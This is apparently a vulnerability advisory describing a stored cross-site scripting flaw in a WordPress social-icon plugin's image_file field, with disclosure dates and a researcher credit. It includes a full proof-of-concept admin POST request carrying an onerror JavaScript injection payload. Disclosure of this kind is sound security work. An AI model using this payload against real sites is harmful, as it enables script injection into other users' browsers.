The plugin does not properly escape the image_file field when adding a new social icon, allowing high privileged users to inject arbitrary javascript even when the unfiltered_html capability is disallowed. Version 3.2.0 adressed some of the issues, but was still vulnerable when clicking to edit the contaminated icon.
POST /wp-admin/admin.php?page=cnss_social_icon_add HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryntci4RWsTIt6kFWd Accept-Encoding: gzip, deflate Cookie: [Admin cookies] Connection: close ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="_wpnonce" 482d64ba75 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/admin.php?page=cnss_social_icon_add ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="title" 55 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="image_file" ." onerror=alert``;// ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="url" 1123 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="sortorder" 4 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="target" 1 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="action" update ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="submit_button" 변경사항 저장 ------WebKitFormBoundaryntci4RWsTIt6kFWd--
qerogram
qerogram
Yes
2022-03-21 (about 4 months ago)
2022-03-21 (about 4 months ago)
2022-04-11 (about 4 months ago)